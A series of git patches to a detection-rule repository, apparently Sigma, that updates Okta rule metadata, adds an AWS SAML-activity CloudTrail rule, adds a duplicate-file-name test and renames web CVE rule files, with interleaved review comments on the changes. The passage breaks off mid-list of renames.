From 74452347fb2c3dfd1035168ec308fe529bd00db6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:43 -0500 Subject: [PATCH 1063/1367] Update okta_user_account_locked_out.yml --- rules/cloud/okta/okta_user_account_locked_out.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_user_account_locked_out.yml b/rules/cloud/okta/okta_user_account_locked_out.yml index 0b5c5930..c036bd96 100644 --- a/rules/cloud/okta/okta_user_account_locked_out.yml +++ b/rules/cloud/okta/okta_user_account_locked_out.yml @@ -1,7 +1,7 @@ title: Okta User Account Locked Out id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a description: Detects when an user account is locked out. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From ecb18ec149940ee286d9d5392d9eba0783d870b2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:53:28 -0500 Subject: [PATCH 1064/1367] Update okta_admin_role_assigned_to_user_or_group.yml --- rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml index e4a20189..7f337701 100644 --- a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml +++ b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml @@ -4,6 +4,7 @@ description: Detects when an the Administrator role is assigned to an user or gr author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 6401f9b4d9e78292d36313f901701adcecdb3690 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Wed, 22 Sep 2021 19:53:36 -0500 Subject: [PATCH 1065/1367] Update okta_api_token_created.yml --- rules/cloud/okta/okta_api_token_created.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml index 9ec18dd6..4969a846 100644 --- a/rules/cloud/okta/okta_api_token_created.yml +++ b/rules/cloud/okta/okta_api_token_created.yml @@ -4,6 +4,7 @@ description: Detects when a API token is created author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From ccd9f8d6dc030203aa8031de235e16b6eca4bc0b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:53:43 -0500 Subject: [PATCH 1066/1367] Update okta_api_token_revoked.yml --- rules/cloud/okta/okta_api_token_revoked.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_api_token_revoked.yml b/rules/cloud/okta/okta_api_token_revoked.yml index 3e3ae817..ba2f81b9 100644 --- a/rules/cloud/okta/okta_api_token_revoked.yml +++ b/rules/cloud/okta/okta_api_token_revoked.yml @@ -4,6 +4,7 @@ description: Detects when a API Token is revoked. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 1effd8b18716d326dc016f77e41238e45d4b2dad Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:53:49 -0500 Subject: [PATCH 1067/1367] Update okta_application_modified_or_deleted.yml --- rules/cloud/okta/okta_application_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) 
diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml index 44d81357..078c764b 100644 --- a/rules/cloud/okta/okta_application_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an application is modified or deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From f673eb413e3109c5e58199bcc4180190e7d383df Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:53:56 -0500 Subject: [PATCH 1068/1367] Update okta_application_sign-on_policy_modified_or_deleted.yml --- .../okta/okta_application_sign-on_policy_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml index e8e950b9..fb13c385 100644 --- a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an application Sign-on Policy is modified or deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From ea73c692d7fa0a44a7eb1cb9477d6e35b67c7e70 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:02 -0500 Subject: [PATCH 1069/1367] Update okta_mfa_reset_or_deactivated.yml --- rules/cloud/okta/okta_mfa_reset_or_deactivated.yml | 1 + 1 file changed, 1 insertion(+) 
diff --git a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml index fc8797b3..acc04ac8 100644 --- a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml +++ b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml @@ -4,6 +4,7 @@ description: Detects when an attempt at deactivating or resetting MFA. author: Austin Songer @austinsonger status: experimental date: 2021/09/21 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 9d910d823ad5333e50cc8595c2c3d85b3da98cc9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:09 -0500 Subject: [PATCH 1070/1367] Update okta_network_zone_deactivated_or_deleted.yml --- rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml index 7b38076c..273d8713 100644 --- a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an Network Zone is Deactivated or Deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 100eb06e7a80e6004a956734b3a9791cff7d2911 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:15 -0500 Subject: [PATCH 1071/1367] Update okta_policy_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_modified_or_deleted.yml index 010f0283..fb4aa5b2 100644 
--- a/rules/cloud/okta/okta_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an Okta policy is modified or deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From f55b9ef024a6497ad68b2dbb108b094df2e1dcdd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:23 -0500 Subject: [PATCH 1072/1367] Update okta_policy_rule_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index 4add1cda..278171eb 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an Policy Rule is Modified or Deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 26b99a44c0cce643f5a4ca92d5d01cef6617ba01 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:32 -0500 Subject: [PATCH 1073/1367] Update okta_security_threat_detected.yml --- rules/cloud/okta/okta_security_threat_detected.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_security_threat_detected.yml b/rules/cloud/okta/okta_security_threat_detected.yml index 73c9b331..8e754c45 100644 --- a/rules/cloud/okta/okta_security_threat_detected.yml +++ b/rules/cloud/okta/okta_security_threat_detected.yml 
@@ -4,6 +4,7 @@ description: Detects when an security threat is detected in Okta. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm - https://developer.okta.com/docs/reference/api/system-log/ From 05d454d7943272985d59c5e1336537c8e2b67faf Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:39 -0500 Subject: [PATCH 1074/1367] Update okta_unauthorized_access_to_app.yml --- rules/cloud/okta/okta_unauthorized_access_to_app.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_unauthorized_access_to_app.yml b/rules/cloud/okta/okta_unauthorized_access_to_app.yml index 113cb352..10305024 100644 --- a/rules/cloud/okta/okta_unauthorized_access_to_app.yml +++ b/rules/cloud/okta/okta_unauthorized_access_to_app.yml @@ -4,6 +4,7 @@ description: Detects when unauthorized access to app occurs. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 097c6c3537b1ca575e0ee669a018b56295ecdc1c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:46 -0500 Subject: [PATCH 1075/1367] Update okta_user_account_locked_out.yml --- rules/cloud/okta/okta_user_account_locked_out.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_user_account_locked_out.yml b/rules/cloud/okta/okta_user_account_locked_out.yml index c036bd96..7acd02c0 100644 --- a/rules/cloud/okta/okta_user_account_locked_out.yml +++ b/rules/cloud/okta/okta_user_account_locked_out.yml 
@@ -4,6 +4,7 @@ description: Detects when an user account is locked out. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From d1337bbfbf49152b1b2373c191e88dc32613cc23 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 20:15:36 -0500 Subject: [PATCH 1076/1367] Create aws_suspicious_saml_activity.yml --- rules/cloud/aws_suspicious_saml_activity.yml | 32 ++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/cloud/aws_suspicious_saml_activity.yml diff --git a/rules/cloud/aws_suspicious_saml_activity.yml b/rules/cloud/aws_suspicious_saml_activity.yml new file mode 100644 index 00000000..44953cc7 --- /dev/null +++ b/rules/cloud/aws_suspicious_saml_activity.yml 
@@ -0,0 +1,32 @@
+title: AWS Suspicious SAML Activity
+id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e
+description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
+author: Austin Songer
+status: experimental
+date: 2021/09/22
+references:
+ - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html
+ - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html
+logsource:
+ service: cloudtrail
+detection:
+ selection1:
+ eventSource: sts.amazonaws.com
+ eventName: Assumerolewithsaml
+ selection2:
+ eventSource: iam.amazonaws.com
+ eventName: UpdateSAMLProvider
+ condition: selection1 or selection2
+level: medium
+tags:
+ - attack.initial_access
+ - attack.t1078
+ - attack.lateral_movement
+ - attack.t1548
+ - attack.privilege_escalation
+ - attack.t1550
+ - attack.t1550.001
+falsepositives:
+ - Automated processes that uses Terraform may lead to false positives.
+ - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 6942b9c5e86335ba4413d9fcd6a9b2d08a90addb Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Wed, 22 Sep 2021 20:16:50 -0500
Subject: [PATCH 1077/1367] Update aws_suspicious_saml_activity.yml
---
 rules/cloud/aws_suspicious_saml_activity.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/aws_suspicious_saml_activity.yml b/rules/cloud/aws_suspicious_saml_activity.yml
index 44953cc7..0b27875a 100644
--- a/rules/cloud/aws_suspicious_saml_activity.yml
+++ b/rules/cloud/aws_suspicious_saml_activity.yml
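Review bot: `eventName: Assumerolewithsaml` in selection1 does not match the event name as CloudTrail records it, which the rule's own reference URL spells `AssumeRoleWithSAML`; on backends that compare keyword fields case-sensitively selection1 will never fire, so the value should be `eventName: AssumeRoleWithSAML`. Separately, selection1 matches every legitimate federated sign-in through the SAML provider, which is likely to make a `medium` rule very noisy, yet the falsepositives section only discusses provider updates — either narrow selection1 or record routine SAML logins as a known false positive. The `attack.t1548` tag is listed under `attack.lateral_movement`, but T1548 (Abuse Elevation Control Mechanism) is a privilege-escalation / defense-evasion technique, so the tag set is worth re-checking against what the two selections actually detect.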
@@ -1,5 +1,5 @@ title: AWS Suspicious SAML Activity -id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e +id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. author: Austin Songer status: experimental From ab613af36528e8a929bb8d8c49e5bd99db2869dc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 22:24:24 -0500 Subject: [PATCH 1078/1367] Update sysmon_atlassian_confluence_cve_2021_26084_exploit.yml --- .../sysmon_atlassian_confluence_cve_2021_26084_exploit.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml index d69b708b..2714a92e 100644 --- a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml +++ b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml @@ -1,7 +1,7 @@ title: Atlassian Confluence CVE-2021-26084 id: 245f92e3-c4da-45f1-9070-bc552e06db11 status: experimental -description: Detects spawing of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 +description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 author: Bhabesh Raj date: 2021/09/08 references: From 53f426342ca8e5255d0275723a9ffd176a5ae51a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 22:26:05 -0500 Subject: [PATCH 1079/1367] Update win_file_winword_cve_2021_40444.yml --- rules/windows/file_event/win_file_winword_cve_2021_40444.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml
index 2cb6e196..1787a6c1 100644
--- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml
+++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml
@@ -1,7 +1,7 @@
 title: Suspicious Word Cab File Write CVE-2021-40444
 id: 60c0a111-787a-4e8a-9262-ee485f3ef9d5
 status: experimental
-description: Detects file creation patterns noticable during the exploitation of CVE-2021-40444
+description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
 references:
 - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20
 - https://twitter.com/vanitasnk/status/1437329511142420483?s=21
From 595e4b9d6dcc92cef18df13a30121078327932cb Mon Sep 17 00:00:00 2001
From: frack113
Date: Thu, 23 Sep 2021 06:50:18 +0200
Subject: [PATCH 1080/1367] add duplicate name file check
---
 tests/test_rules.py | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/tests/test_rules.py b/tests/test_rules.py
index 78bc956a..16dbb0dc 100755
--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -519,10 +519,14 @@ class TestRules(unittest.TestCase):
 def test_file_names(self):
 faulty_rules = []
+ name_lst = []
 filename_pattern = re.compile('[a-z0-9_]{10,70}\.yml')
 for file in self.yield_next_rule_file_path(self.path_to_rules):
 filename = os.path.basename(file)
- if filename[-4:] != ".yml":
+ if filename in name_lst:
+ print(Fore.YELLOW + "Rule {} is a duplicate file name.".format(file))
+ faulty_rules.append(file)
+ elif filename[-4:] != ".yml":
 print(Fore.YELLOW + "Rule {} has a invalid extension (.yml).".format(file))
 faulty_rules.append(file)
 elif len(filename) > 74:
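Review bot: `if filename in name_lst:` scans a plain list, so every rule file costs a linear search and the check grows quadratically with the size of the rule set; the same test is O(1) with `name_lst = set()` here and `name_lst.add(filename)` in place of the append that the next hunk adds. The duplicate message also names only the later path, which makes the collision hard to locate from the test output — keeping `{filename: file}` in a dict instead of a set would let the message cite the earlier file as well. test_file_names continues past the end of this hunk.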
@@ -534,6 +538,7 @@ class TestRules(unittest.TestCase):
 elif filename_pattern.match(filename) == None or not '_' in filename:
 print(Fore.YELLOW + "Rule {} has a file name that doesn't match our standard.".format(file))
 faulty_rules.append(file)
+ name_lst.append(filename)
 self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed file names (too short, too long, uppercase letters, a minus sign etc.). Please see the file names used in our repository and adjust your file names accordingly. The pattern for a valid file name is '[a-z0-9_]{10,70}\.yml' and it has to contain at least an underline character.")
From 605fa2dd8083c9591251d9c793b332463981294a Mon Sep 17 00:00:00 2001
From: frack113
Date: Thu, 23 Sep 2021 07:58:50 +0200
Subject: [PATCH 1081/1367] update filename
---
 .../okta_application_sign_on_policy_modified_or_deleted.yml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml
index 3b067027..aaccaad3 100644
--- a/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml
+++ b/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml
@@ -1,9 +1,10 @@
 title: Okta Application Sign-On Policy Modified or Deleted
 id: 8f668cc4-c18e-45fe-ad00-624a981cf88a
 description: Detects when an application Sign-on Policy is modified or deleted.
-author: Austin Songer
+author: Austin Songer @austinsonger
 status: experimental
 date: 2021/09/12
+modified: 2021/09/22
 references:
 - https://developer.okta.com/docs/reference/api/system-log/
 - https://developer.okta.com/docs/reference/api/event-types/
@@ -19,4 +20,4 @@ level: medium
 tags:
 - attack.impact
 falsepositives:
- - Unknown
+ - Unknown
\ No newline at end of file
From c029e62c6423fdce4c21fcaed7f74f78d3d8a464 Mon Sep 17 00:00:00 2001
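Review bot: The assertion message on the last hunk line still lists only malformed-name causes ("too short, too long, uppercase letters, a minus sign etc.") while `faulty_rules` now also collects duplicate basenames, so a failure raised by the new check steers the contributor toward the wrong fix; extend that message with something like `, or a file name that is already used by another rule`. The added `name_lst.append(filename)` appears to sit outside the if/elif chain so that flagged files are recorded too, which is the right choice but not obvious — a one-line comment such as `# record every name, flagged or not, so later duplicates are still caught` would make the intent explicit. The hunk ends at the assertEqual call; whether test_file_names ends there is not visible here.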
From: frack113 Date: Thu, 23 Sep 2021 14:37:34 +0200 Subject: [PATCH 1082/1367] fix filename --- ...ion_attempt.yml => web_cve_2010_4617_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_5278_exploitation_attempt.yml} | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-4617_exploitation_attempt.yml => web_cve_2010_4617_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-5278_exploitation_attempt.yml => web_cve_2010_5278_exploitation_attempt.yml} (100%) diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yml b/rules/web/web_cve_2010_4617_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-4617_exploitation_attempt.yml rename to rules/web/web_cve_2010_4617_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yml b/rules/web/web_cve_2010_5278_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-5278_exploitation_attempt.yml rename to rules/web/web_cve_2010_5278_exploitation_attempt.yml From 8b5f62bdb72125963775ccd15ef1e20556111661 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Thu, 23 Sep 2021 14:41:16 +0200 Subject: [PATCH 1083/1367] fix filename --- ...ion_attempt.yml => web_cve_2010_1980_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1981_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1983_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2033_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2034_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2035_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2036_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2122_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2259_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2307_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2682_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2861_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_2920_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_3426_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_4231_exploitation_attempt.yml} | 0 15 files changed, 0 insertions(+), 0 deletions(-) rename rules/web/{web_cve-2010-1980_exploitation_attempt.yml => web_cve_2010_1980_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1981_exploitation_attempt.yml => web_cve_2010_1981_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-1983_exploitation_attempt.yml => web_cve_2010_1983_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2033_exploitation_attempt.yml => web_cve_2010_2033_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2034_exploitation_attempt.yml => web_cve_2010_2034_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2035_exploitation_attempt.yml => web_cve_2010_2035_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2036_exploitation_attempt.yml => web_cve_2010_2036_exploitation_attempt.yml} 
(100%) rename rules/web/{web_cve-2010-2122_exploitation_attempt.yml => web_cve_2010_2122_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2259_exploitation_attempt.yml => web_cve_2010_2259_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2307_exploitation_attempt.yml => web_cve_2010_2307_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2682_exploitation_attempt.yml => web_cve_2010_2682_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2861_exploitation_attempt.yml => web_cve_2010_2861_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-2920_exploitation_attempt.yml => web_cve_2010_2920_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-3426_exploitation_attempt.yml => web_cve_2010_3426_exploitation_attempt.yml} (100%) rename rules/web/{web_cve-2010-4231_exploitation_attempt.yml => web_cve_2010_4231_exploitation_attempt.yml} (100%) diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yml b/rules/web/web_cve_2010_1980_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1980_exploitation_attempt.yml rename to rules/web/web_cve_2010_1980_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yml b/rules/web/web_cve_2010_1981_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1981_exploitation_attempt.yml rename to rules/web/web_cve_2010_1981_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yml b/rules/web/web_cve_2010_1983_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1983_exploitation_attempt.yml rename to rules/web/web_cve_2010_1983_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yml b/rules/web/web_cve_2010_2033_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2033_exploitation_attempt.yml rename to rules/web/web_cve_2010_2033_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yml b/rules/web/web_cve_2010_2034_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2034_exploitation_attempt.yml rename to rules/web/web_cve_2010_2034_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yml b/rules/web/web_cve_2010_2035_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2035_exploitation_attempt.yml rename to rules/web/web_cve_2010_2035_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yml b/rules/web/web_cve_2010_2036_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2036_exploitation_attempt.yml rename to rules/web/web_cve_2010_2036_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yml b/rules/web/web_cve_2010_2122_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2122_exploitation_attempt.yml rename to rules/web/web_cve_2010_2122_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yml b/rules/web/web_cve_2010_2259_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2259_exploitation_attempt.yml rename to rules/web/web_cve_2010_2259_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yml b/rules/web/web_cve_2010_2307_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2307_exploitation_attempt.yml rename to rules/web/web_cve_2010_2307_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yml b/rules/web/web_cve_2010_2682_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2682_exploitation_attempt.yml rename to rules/web/web_cve_2010_2682_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yml b/rules/web/web_cve_2010_2861_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2861_exploitation_attempt.yml rename to rules/web/web_cve_2010_2861_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yml b/rules/web/web_cve_2010_2920_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2920_exploitation_attempt.yml rename to rules/web/web_cve_2010_2920_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yml b/rules/web/web_cve_2010_3426_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-3426_exploitation_attempt.yml rename to rules/web/web_cve_2010_3426_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yml b/rules/web/web_cve_2010_4231_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-4231_exploitation_attempt.yml rename to rules/web/web_cve_2010_4231_exploitation_attempt.yml From 89776b8c14d522cc7b1d16b3aab82a18b753b112 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Thu, 23 Sep 2021 14:44:51 +0200 Subject: [PATCH 1084/1367] fix filename --- ...ion_attempt.yml => web_cve_2010_1535_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1601_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1602_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1607_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1657_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1659_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1714_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1717_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1718_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1719_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1722_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1875_exploitation_attempt.yml} | 0 ...ion_attempt.yml => web_cve_2010_1953_exploitation_attempt.yml} | 0 ...ion_attempt.yml => 